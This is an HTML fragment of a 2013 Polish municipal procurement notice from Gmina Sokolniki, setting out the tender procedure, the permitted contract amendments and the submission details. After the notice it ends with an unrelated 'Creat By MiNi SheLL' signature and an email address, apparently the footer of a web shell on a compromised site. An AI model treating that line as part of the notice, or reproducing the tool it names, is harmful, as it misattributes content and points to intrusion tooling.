<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian :
Zamawiający dopuszcza dokonania zmiany umowy zgodnie z art.144 ustawy, w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków : 
 1.Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach : 
     1) w uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających
         z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
     2) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, 
         a zmiany wynikły w trakcie realizacji zamówienia,
     3) aktualizacji rozwiązań z uwagi na postęp technologiczny,
     4) zmiany w sposobie dokonywania płatności,
     5) zmiany danych Wykonawcy, np. zmiana adresu, nr REGON, osób kontaktowych itp.,
     6) zmiany koordynatora, lub osób do kontaktów,
     7) uwarunkowań społecznych (protesty, listy,petycje, itp.),
     8) rezygnacji przez Zamawiającego z części usługi,
     9) zmiany przepisów prawa,
   10) braku możliwości kontynuacji z winy Zamawiającego.
2.Termin realizacji przedmiotu umowy, może ulec przedłużeniu w przypadku zajścia okoliczności 
   uniemożliwiających terminowe zrealizowanie przedmiotu zamówienia o czas trwania przeszkody,
   chyba, że przeszkoda leży po stronie Wykonawcy.
3.Zamawiający może jednostronnie zmienić (wydłużyć) terminy wskazane w harmonogramie
   rzeczowo - terminowym prac projektowych stanowiących załącznik do umowy, w przypadku
   zaistnienia okoliczności, których nie przewidział w chwili zawarcia umowy - zmiana terminu
   wykonania zamówienia.
4.Zakres rzeczowy zamówienia określony umową może zostać ograniczony przez Zamawiającego,
   bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie
   przedmiotu zamówienia  w pełnym zakresie nie leży w interesie publicznym, czego nie można
   było wcześniej przewidzieć.
5.Warunki dokonania zmian : 
   1) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną
       na piśmie, pod rygorem nieważności,
   2) strona występująca o zmianę postanowień zawartej umowy : 
opisze zaistniałą okoliczność,
uzasadni, udokumentuje zaistnienie powyżej okoliczności,
obliczy koszty zmiany, jeśli zmiana będzie miała wpływ na wynagrodzenie
Wykonawcy,
opisze wpływ zmiany na termin wykonania umowy.
    3) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 
6.Zamawiający dopuszcza możliwość zmiany podwykonawcy za pisemna zgodą Zamawiającego 
   w zakresie określonym w ofercie lub wprowadzenie nowych z zastrzeżeniem, iż nie mogą oni
   realizować części zamówienia przewidzianej do wyłącznej kompetencji Wykonawcy (o ile takie
   zastrzeżenie zostało dokonane przez zamawiającego w SIWZ). Wraz z niniejszą propozycją,
   Wykonawca zobowiązany jest przedstawić umowę z podwykonawcą)ami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sokolniki, 98 - 420 Sokolniki
ul. Marszałka Józefa Piłsudskiego 1
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 11:00, miejsce: Urząd Gminy Sokolniki,  98 - 420 Sokolniki
ul. Marszałka Józefa Piłsudskiego 1
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com